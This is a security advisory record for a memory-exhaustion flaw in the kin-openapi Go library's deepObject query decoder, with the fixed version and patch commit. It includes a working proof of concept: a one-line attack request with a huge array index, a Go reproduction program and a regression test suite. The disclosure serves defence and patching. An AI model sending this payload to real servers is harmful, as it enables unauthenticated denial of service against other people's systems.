{"id":"CVE-2026-77354","aliases":[],"url":"https://o3.security/vulnerability/CVE-2026-77354","summary":"kin-openapi has uncontrolled resource consumption in openapi3filter deepObject query parameter decoding","details":"### Summary\n\nAn uncontrolled resource consumption vulnerability in `openapi3filter` lets any unauthenticated client force multi-gigabyte heap allocation with a single, tiny HTTP request. When a spec declares a `deepObject`-style query parameter whose schema contains an array (a normal, documented pattern), the decoder reconstructs the array by reading the **largest attacker-supplied index** and allocating one slot for every position from `0` up to that index — *before* schema validation (including `maxItems`) ever runs. A request as small as 24 bytes (`?param[items][50000000]=x`) drives heap allocation to **~6.1 GiB**, reliably triggering an OOM kill / restart loop on memory-constrained services.\n\n### Details\n\nThe OpenAPI `style: deepObject` serialization lets clients express arrays in the query string using bracket notation, e.g. `param[items][0]=a&param[items][1]=b`. The decoder first collects these into an intermediate `map[string]any` keyed by the string of the index, then converts that sparse map into a real `[]any` in [`sliceMapToSlice`](https://github.com/getkin/kin-openapi/blob/master/openapi3filter/req_resp_decoder.go#L936):\n\n```go\n// req_resp_decoder.go (vulnerable version)\nfunc sliceMapToSlice(m map[string]any) ([]any, error) {\n\tvar result []any\n\tkeys := make([]int, 0, len(m))\n\tfor k := range m {\n\t\tkey, err := strconv.Atoi(k)          // \"50000000\" -> 50000000, attacker-controlled\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"array indexes must be integers: %w\", err)\n\t\t}\n\t\tkeys = append(keys, key)\n\t}\n\tmax := -1\n\tfor _, k := range keys {\n\t\tif k > max {\n\t\t\tmax = k                          // max = attacker's index, unbounded\n\t\t}\n\t}\n\tfor i := 0; i <= max; i++ {              // <-- unbounded loop, 0 .. max\n\t\tval, ok := m[strconv.Itoa(i)]\n\t\tif !ok {\n\t\t\tresult = append(result, nil)     // fills every sparse hole with nil\n\t\t\tcontinue\n\t\t}\n\t\tresult = append(result, val)\n\t}\n\treturn result, nil\n}\n```\n\nA second, equally-sized allocation follows immediately in [`buildResObj`](https://github.com/getkin/kin-openapi/blob/master/openapi3filter/req_resp_decoder.go#L986):\n\n```go\nresultArr := make([]any /*not 0,*/, len(arr))   // second allocation, size = max+1\nfor i := range arr {\n\tr, err := buildResObj(params, mapKeys, strconv.Itoa(i), schema.Value.Items)\n\t...\n}\n```\n\nSo a single attacker-chosen integer `N` produces an `append`-grown `[]any` of length `N+1`, a second `make([]any, N+1)`, and `N+1` recursion steps — with **no upper bound** other than `strconv.Atoi`'s `int` range (~9.2×10¹⁸ on 64-bit) and available memory.\n\n**Why `maxItems` does not help.** `maxItems` is enforced by schema *validation*, which runs strictly after parameter *decoding* completes. `sliceMapToSlice`/`buildResObj` fully materialize the oversized array first; validation only inspects — and rejects — the already-allocated result. The PoC below demonstrates this ordering directly: the returned error is the `maxItems` violation, proving the allocation happened before it could be prevented.\n\n**Why this is deepObject-specific.** Every other array-bearing surface was driven with an equivalent large-index/large-array payload and stayed under ~27 KiB: `application/json` bodies build arrays element-by-element from the literal (no \"index\" concept to inflate); `x-www-form-urlencoded` and `multipart/form-data` arrays are sized by the number of repeated fields actually sent; and the other `makeObject` call sites (path/`simple`, header/`simple`, cookie/`form`, at [`:479`](https://github.com/getkin/kin-openapi/blob/master/openapi3filter/req_resp_decoder.go#L479), [`:777`](https://github.com/getkin/kin-openapi/blob/master/openapi3filter/req_resp_decoder.go#L777), [`:841`](https://github.com/getkin/kin-openapi/blob/master/openapi3filter/req_resp_decoder.go#L841)) build their intermediate map via `propsFromString`, which splits on delimiters and produces property-name keys, never bracketed integer indexes. Only the deepObject `propsFn` ([`:661-687`](https://github.com/getkin/kin-openapi/blob/master/openapi3filter/req_resp_decoder.go#L661)) synthesizes the bracketed integer keys that reach `sliceMapToSlice` with an attacker-controlled magnitude.\n\n**Preconditions.** The target spec needs a query parameter with `in: query`, `style: deepObject` (typically `explode: true`), and a schema whose graph contains at least one `type: array`. This is an entirely normal, author-written spec — it is exactly the pattern the library's own decoder tests exercise. No hostile spec authoring is required, and the attack works regardless of any `maxItems` constraint on the array.\n\n**Introduced in.** `sliceMapToSlice`, including the unbounded `0..max` fill loop, was added whole-cloth in commit [`78bb273`](https://github.com/getkin/kin-openapi/commit/78bb273e5892da3b0c8fc31857499449adfaba6c) (\"openapi3filter: deepObject array of objects and array of arrays support (#923)\", merged 2024-03-22), which first shipped in **`v0.124.0`**. Every tagged release from `v0.124.0` through the current `v0.141.0` / `master` (`1d0a337`) contains the vulnerable code path.\n\n### PoC\n\nVerified against revision `1d0a337c9b1570fab283be8a04c8af6e43b9a22c` (`v0.141.0`, current `master` at the time of writing), Go 1.25.0, `darwin/arm64`.\n\n**1. Spec** — one operation accepting a `deepObject` query parameter whose `items` property is an array (`maxItems: 3` is declared deliberately, to prove it does not help):\n\n```yaml\nopenapi: '3.0.3'\ninfo: {title: t, version: '1.0.0'}\npaths:\n  /q:\n    get:\n      parameters:\n        - name: param\n          in: query\n          style: deepObject\n          explode: true\n          schema:\n            type: object\n            properties:\n              items:\n                type: array\n                maxItems: 3\n                items: {type: string}\n      responses:\n        '200': {description: ok}\n```\n\n**2. Program** — build a request with a single huge array index and measure heap allocation across the same public entry point (`gorillamux` router → `openapi3filter.ValidateRequest`) any real HTTP server uses:\n\n```go\npackage main\n\nimport (\n\t\"context\"\n\t\"fmt\"\n\t\"net/http\"\n\t\"runtime\"\n\n\t\"github.com/getkin/kin-openapi/openapi3\"\n\t\"github.com/getkin/kin-openapi/openapi3filter\"\n\t\"github.com/getkin/kin-openapi/routers/gorillamux\"\n)\n\nconst spec = `\nopenapi: '3.0.3'\ninfo: {title: t, version: '1.0.0'}\npaths:\n  /q:\n    get:\n      parameters:\n        - name: param\n          in: query\n          style: deepObject\n          explode: true\n          schema:\n            type: object\n            properties:\n              items:\n                type: array\n                maxItems: 3\n                items: {type: string}\n      responses:\n        '200': {description: ok}\n`\n\nfunc main() {\n\tloader := openapi3.NewLoader()\n\tdoc, _ := loader.LoadFromData([]byte(spec))\n\t_ = doc.Validate(loader.Context)\n\trouter, _ := gorillamux.NewRouter(doc)\n\n\t// Attacker-controlled index. A 24-byte query string is enough to force\n\t// materialization of a 50-million-element slice.\n\tconst rawQuery = \"param[items][50000000]=x\"\n\n\tr, _ := http.NewRequest(http.MethodGet, \"/q?\"+rawQuery, nil)\n\troute, pp, _ := router.FindRoute(r)\n\n\tvar before, after runtime.MemStats\n\truntime.GC()\n\truntime.ReadMemStats(&before)\n\n\terr := openapi3filter.ValidateRequest(context.Background(), &openapi3filter.RequestValidationInput{\n\t\tRequest: r, PathParams: pp, Route: route,\n\t\tOptions: &openapi3filter.Options{AuthenticationFunc: openapi3filter.NoopAuthenticationFunc},\n\t})\n\n\truntime.ReadMemStats(&after)\n\n\tfmt.Printf(\"query string: %q (%d bytes)\\n\", rawQuery, len(rawQuery))\n\tfmt.Printf(\"heap allocated during ValidateRequest: %.1f MiB\\n\", float64(after.TotalAlloc-before.TotalAlloc)/(1<<20))\n\tfmt.Printf(\"ValidateRequest error: %v\\n\", err)\n}\n```\n\n**3. Observed output** (`go run .`, unpatched tree, re-verified in this pass):\n\n```\nquery string: \"param[items][50000000]=x\" (24 bytes)\nheap allocated during ValidateRequest: 6231.1 MiB\nValidateRequest error: parameter \"param\" in query has an error: Error at \"/items\": maximum number of items is 3\n```\n\nA **24-byte query string drove ~6.1 GiB of heap allocation** in a single call, and the returned error is the `maxItems` rejection — proof that the array was fully materialized *before* validation could reject it. Scaling the index shows the amplification is linear and attacker-tunable (measured over several runs on this revision):\n\n| Query string | Wire size | Heap allocated | Amplification |\n|---|---|---|---|\n| `param[items][10000]=x` | 21 B | 0.9 MiB | ~44,000× |\n| `param[items][100000]=x` | 22 B | 11.1 MiB | ~529,000× |\n| `param[items][1000000]=x` | 23 B | 114 MiB | ~5,200,000× |\n| `param[items][5000000]=x` | 23 B | 555 MiB | ~25,300,000× |\n| `param[items][50000000]=x` | 24 B | **6.1 GiB** | ~272,000,000× |\n\n**Attack request** (nothing else required — no body, no auth, no unusual headers):\n\n```\nGET /whatever?param[items][50000000]=x HTTP/1.1\nHost: victim\n```\n\n**Control (confirms only deepObject is a vector):** repeating the equivalent \"large array\" attempt against `application/json`, `application/x-www-form-urlencoded`, `multipart/form-data` bodies, and non-deepObject `path`/`header`/`cookie` styles stays under ~27 KiB in every case.\n\n**4. Regression/scaling test suite** — a broader harness driving the same public entry point, adding the ordering proof (`TestC02_AllocationBeforeValidation`), the nested-index amplifier, and the cross-encoding controls referenced above. Save as `openapi3filter/zzz_c02_verify_test.go` and run with `C02_BIG=1 go test -run TestC02 ./openapi3filter/ -v` (unset `C02_BIG` to skip the two largest, slower indexes):\n\n```go\npackage openapi3filter_test\n\nimport (\n\t\"bytes\"\n\t\"fmt\"\n\t\"mime/multipart\"\n\t\"net/http\"\n\t\"net/url\"\n\t\"os\"\n\t\"runtime\"\n\t\"strings\"\n\t\"testing\"\n\n\t\"github.com/stretchr/testify/require\"\n\n\t\"github.com/getkin/kin-openapi/openapi3\"\n\t\"github.com/getkin/kin-openapi/openapi3filter\"\n\t\"github.com/getkin/kin-openapi/routers/gorillamux\"\n)\n\n// measureAlloc runs fn and reports the number of bytes of heap it caused to be\n// allocated (TotalAlloc delta), which counts even memory that was already freed\n// by the time fn returned. This captures transient allocation spikes.\nfunc measureAlloc(fn func()) uint64 {\n\tvar before, after runtime.MemStats\n\truntime.GC()\n\truntime.ReadMemStats(&before)\n\tfn()\n\truntime.ReadMemStats(&after)\n\treturn after.TotalAlloc - before.TotalAlloc\n}\n\nconst c02Spec = `\nopenapi: '3.0.3'\ninfo: {title: t, version: '1.0.0'}\npaths:\n  /q:\n    get:\n      parameters:\n        - name: param\n          in: query\n          style: deepObject\n          explode: true\n          schema:\n            type: object\n            properties:\n              items:\n                type: array\n                maxItems: 3\n                items: {type: string}\n      responses:\n        '200': {description: ok}\n`\n\nfunc c02Router(t *testing.T) (*openapi3.T, func(rawquery string) error) {\n\tt.Helper()\n\tloader := openapi3.NewLoader()\n\tctx := loader.Context\n\tdoc, err := loader.LoadFromData([]byte(c02Spec))\n\trequire.NoError(t, err)\n\trequire.NoError(t, doc.Validate(ctx))\n\trouter, err := gorillamux.NewRouter(doc)\n\trequire.NoError(t, err)\n\n\tvalidate := func(rawquery string) error {\n\t\treq, err := http.NewRequest(http.MethodGet, \"/q?\"+rawquery, nil)\n\t\trequire.NoError(t, err)\n\t\troute, pathParams, err := router.FindRoute(req)\n\t\trequire.NoError(t, err)\n\t\treturn openapi3filter.ValidateRequest(ctx, &openapi3filter.RequestValidationInput{\n\t\t\tRequest:    req,\n\t\t\tPathParams: pathParams,\n\t\t\tRoute:      route,\n\t\t\tOptions:    &openapi3filter.Options{AuthenticationFunc: openapi3filter.NoopAuthenticationFunc},\n\t\t})\n\t}\n\treturn doc, validate\n}\n\n// TestC02_Reproduce_MemoryExhaustion measures the allocation caused by a single\n// tiny deepObject query with a large array index.\nfunc TestC02_Reproduce_MemoryExhaustion(t *testing.T) {\n\t_, validate := c02Router(t)\n\n\tbase := measureAlloc(func() {\n\t\t_ = validate(\"param[items][0]=a&param[items][1]=b&param[items][2]=c\")\n\t})\n\tt.Logf(\"baseline (3 legit items): %s allocated\", humanBytes(base))\n\n\tindexes := []int{10_000, 100_000, 1_000_000}\n\tif os.Getenv(\"C02_BIG\") == \"1\" {\n\t\tindexes = append(indexes, 5_000_000, 50_000_000)\n\t}\n\n\tconst fixThreshold = 32 << 20 // 32 MiB: no fixed-tree request should approach this\n\tworst := uint64(0)\n\tfor _, idx := range indexes {\n\t\tq := fmt.Sprintf(\"param[items][%d]=x\", idx)\n\t\talloc := measureAlloc(func() {\n\t\t\terr := validate(q)\n\t\t\trequire.Error(t, err) // rejected either by the cap (fixed) or maxItems (vuln)\n\t\t})\n\t\tif alloc > worst {\n\t\t\tworst = alloc\n\t\t}\n\t\tratio := float64(alloc) / float64(len(q))\n\t\tt.Logf(\"index=%-10d query=%dB -> %s allocated (%.0fx over the query size)\",\n\t\t\tidx, len(q), humanBytes(alloc), ratio)\n\t}\n\trequire.Less(t, worst, uint64(fixThreshold),\n\t\t\"C-02 REGRESSION: a tiny deepObject query allocated %s; the sliceMapToSlice cap is missing or too high\",\n\t\thumanBytes(worst))\n}\n\n// TestC02_AllocationBeforeValidation checks the ordering: on the vulnerable\n// tree the huge allocation happened even though maxItems:3 is declared, proving\n// materialization precedes schema validation.\nfunc TestC02_AllocationBeforeValidation(t *testing.T) {\n\t_, validate := c02Router(t)\n\n\tconst idx = 2_000_000\n\tq := fmt.Sprintf(\"param[items][%d]=x\", idx)\n\n\tvar gotErr error\n\talloc := measureAlloc(func() {\n\t\tgotErr = validate(q)\n\t})\n\trequire.Error(t, gotErr)\n\tt.Logf(\"index=%d (query %d bytes) allocated %s; error: %v\",\n\t\tidx, len(q), humanBytes(alloc), gotErr)\n\n\t// On the vulnerable tree this value was ~225 MiB and this assertion fails,\n\t// flagging the regression. On the fixed tree it stays well under 32 MiB.\n\trequire.Less(t, alloc, uint64(32<<20),\n\t\t\"C-02 REGRESSION: index %d allocated %s before rejection\", idx, humanBytes(alloc))\n}\n\n// TestC02_OnlyDeepObjectAffected proves the blast radius: JSON, multipart, and\n// urlencoded array handling do NOT go through sliceMapToSlice, so an equivalent\n// \"large index\" payload in those encodings does not explode.\nfunc TestC02_OnlyDeepObjectAffected(t *testing.T) {\n\tspec := `\nopenapi: '3.0.3'\ninfo: {title: t, version: '1.0.0'}\npaths:\n  /b:\n    post:\n      requestBody:\n        content:\n          application/json:\n            schema:\n              type: object\n              properties:\n                items: {type: array, maxItems: 3, items: {type: string}}\n          application/x-www-form-urlencoded:\n            schema:\n              type: object\n              properties:\n                items: {type: array, maxItems: 3, items: {type: string}}\n          multipart/form-data:\n            schema:\n              type: object\n              properties:\n                items: {type: array, maxItems: 3, items: {type: string}}\n      responses:\n        '200': {description: ok}\n`\n\tloader := openapi3.NewLoader()\n\tctx := loader.Context\n\tdoc, err := loader.LoadFromData([]byte(spec))\n\trequire.NoError(t, err)\n\trequire.NoError(t, doc.Validate(ctx))\n\trouter, err := gorillamux.NewRouter(doc)\n\trequire.NoError(t, err)\n\n\tdo := func(ct, body string) (error, uint64) {\n\t\tvar e error\n\t\talloc := measureAlloc(func() {\n\t\t\treq, _ := http.NewRequest(http.MethodPost, \"/b\", strings.NewReader(body))\n\t\t\treq.Header.Set(\"Content-Type\", ct)\n\t\t\troute, pathParams, rerr := router.FindRoute(req)\n\t\t\trequire.NoError(t, rerr)\n\t\t\te = openapi3filter.ValidateRequest(ctx, &openapi3filter.RequestValidationInput{\n\t\t\t\tRequest: req, PathParams: pathParams, Route: route,\n\t\t\t\tOptions: &openapi3filter.Options{AuthenticationFunc: openapi3filter.NoopAuthenticationFunc},\n\t\t\t})\n\t\t})\n\t\treturn e, alloc\n\t}\n\n\t_, jsonAlloc := do(\"application/json\", `{\"items\":[\"a\",\"b\",\"c\",\"d\"]}`)\n\tt.Logf(\"JSON 4-elem array: %s\", humanBytes(jsonAlloc))\n\trequire.Less(t, jsonAlloc, uint64(4<<20), \"JSON path must not balloon\")\n\n\tform := url.Values{}\n\tform.Set(\"items\", \"a\")\n\tform.Add(\"items\", \"b\")\n\t_, formAlloc := do(\"application/x-www-form-urlencoded\", form.Encode())\n\tt.Logf(\"urlencoded repeated field: %s\", humanBytes(formAlloc))\n\trequire.Less(t, formAlloc, uint64(4<<20), \"urlencoded path must not balloon\")\n\n\tvar buf bytes.Buffer\n\tw := multipart.NewWriter(&buf)\n\trequire.NoError(t, w.WriteField(\"items\", \"a\"))\n\trequire.NoError(t, w.WriteField(\"items\", \"b\"))\n\trequire.NoError(t, w.Close())\n\t_, mpAlloc := do(w.FormDataContentType(), buf.String())\n\tt.Logf(\"multipart fields: %s\", humanBytes(mpAlloc))\n\trequire.Less(t, mpAlloc, uint64(4<<20), \"multipart path must not balloon\")\n}\n\n// TestC02_NonDeepObjectStylesSafe checks the other makeObject entry points\n// (path/simple, header/simple, cookie/form). These build props via\n// propsFromString, whose keys are property names, not bracketed integer\n// indexes -- so a big number lands as a string key that fails strconv.Atoi\n// cleanly, without materializing a giant slice.\nfunc TestC02_NonDeepObjectStylesSafe(t *testing.T) {\n\tspec := `\nopenapi: '3.0.3'\ninfo: {title: t, version: '1.0.0'}\npaths:\n  /p/{param}:\n    get:\n      parameters:\n        - name: param\n          in: path\n          required: true\n          style: simple\n          explode: false\n          schema:\n            type: object\n            properties:\n              items: {type: array, maxItems: 3, items: {type: string}}\n      responses:\n        '200': {description: ok}\n`\n\tloader := openapi3.NewLoader()\n\tctx := loader.Context\n\tdoc, err := loader.LoadFromData([]byte(spec))\n\trequire.NoError(t, err)\n\trequire.NoError(t, doc.Validate(ctx))\n\trouter, err := gorillamux.NewRouter(doc)\n\trequire.NoError(t, err)\n\n\talloc := measureAlloc(func() {\n\t\treq, _ := http.NewRequest(http.MethodGet, \"/p/items,5000000\", nil)\n\t\troute, pathParams, rerr := router.FindRoute(req)\n\t\trequire.NoError(t, rerr)\n\t\t_ = openapi3filter.ValidateRequest(ctx, &openapi3filter.RequestValidationInput{\n\t\t\tRequest: req, PathParams: pathParams, Route: route,\n\t\t\tOptions: &openapi3filter.Options{AuthenticationFunc: openapi3filter.NoopAuthenticationFunc},\n\t\t})\n\t})\n\tt.Logf(\"path/simple object with big scalar: %s\", humanBytes(alloc))\n\trequire.Less(t, alloc, uint64(4<<20), \"path/simple must not balloon\")\n}\n\nfunc humanBytes(b uint64) string {\n\tconst unit = 1024\n\tif b < unit {\n\t\treturn fmt.Sprintf(\"%d B\", b)\n\t}\n\tdiv, exp := uint64(unit), 0\n\tfor n := b / unit; n >= unit; n /= unit {\n\t\tdiv *= unit\n\t\texp++\n\t}\n\treturn fmt.Sprintf(\"%.1f %ciB\", float64(b)/float64(div), \"KMGTPE\"[exp])\n}\n```\n\n**Observed output re-run in this pass** (`C02_BIG=1 go test -run TestC02 ./openapi3filter/ -v`):\n\n- **Unpatched tree** (fix reverted via `git stash push -- openapi3filter/req_resp_decoder.go`): `TestC02_Reproduce_MemoryExhaustion` reproduced the full scaling table above (10,000 → 937.5 KiB through 50,000,000 → 6.1 GiB), and `TestC02_AllocationBeforeValidation` measured **225.2 MiB** allocated for `index=2,000,000` before the `maxItems` rejection fired — both matching the standalone PoC's findings and failing their bounded-allocation assertions as expected.\n- **Patched tree** (fix restored): all five tests pass; the worst-case allocation across every index, including 50,000,000, drops to 51.1 KiB, and `TestC02_OnlyDeepObjectAffected` / `TestC02_NonDeepObjectStylesSafe` confirm the other encodings and parameter styles were never affected.\n\n### Impact\n\n- **Type:** Uncontrolled Resource Consumption (CWE-789, Memory Allocation with Excessive Size Value / CWE-400, Uncontrolled Resource Consumption) → **unauthenticated remote denial of service**.\n- **Who is impacted:** any application using `github.com/getkin/kin-openapi/openapi3filter` to validate requests against a spec that declares an `in: query`, `style: deepObject` parameter whose schema contains an array anywhere in its property graph. This is a normal, documented OpenAPI pattern, not a hostile or unusual spec.\n- **Attack:** a single unauthenticated `GET` request with a small, attacker-chosen query string (as few as ~21–24 bytes). No body, no credentials, no special client tooling, no chunked-encoding or `Content-Length` trickery — the trigger lives entirely in the query string, so request-body size limits do not mitigate it.\n- **Consequence:** a single request can force hundreds of megabytes to multiple gigabytes of heap allocation; a handful of concurrent requests reliably exhausts memory on typical container limits (256 MB–2 GB), producing an OOM kill / restart loop. The declared `maxItems` constraint on the array does **not** prevent this, because materialization happens during decoding, strictly before schema validation runs.\n- **Not affected:** specs that do not use `style: deepObject` for array-bearing query parameters; requests via `application/json`, `x-www-form-urlencoded`, or `multipart/form-data` bodies; and `path`/`header`/`cookie` styled object parameters (all verified empirically above, and re-verified in this pass).","published":"2026-08-21T20:56:56Z","modified":"2026-08-21T21:00:08.441595042Z","cvss":null,"epss":null,"cisaKev":null,"exploitsKnown":null,"affectedPackages":[{"ecosystem":"Go","name":"github.com/getkin/kin-openapi","fixedVersion":"0.142.0"}],"fix":{"url":"https://github.com/getkin/kin-openapi/commit/1223a0f215d2cf9beb2d9eb9ea2649d001c21388","label":"getkin/kin-openapi@1223a0f"},"references":[{"type":"WEB","url":"https://github.com/getkin/kin-openapi/security/advisories/GHSA-xhj3-7xw9-vr34"},{"type":"WEB","url":"https://github.com/getkin/kin-openapi/commit/1223a0f215d2cf9beb2d9eb9ea2649d001c21388"},{"type":"PACKAGE","url":"https://github.com/getkin/kin-openapi"},{"type":"WEB","url":"https://github.com/getkin/kin-openapi/releases/tag/v0.142.0"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-21T21:00:08.441595042Z"}}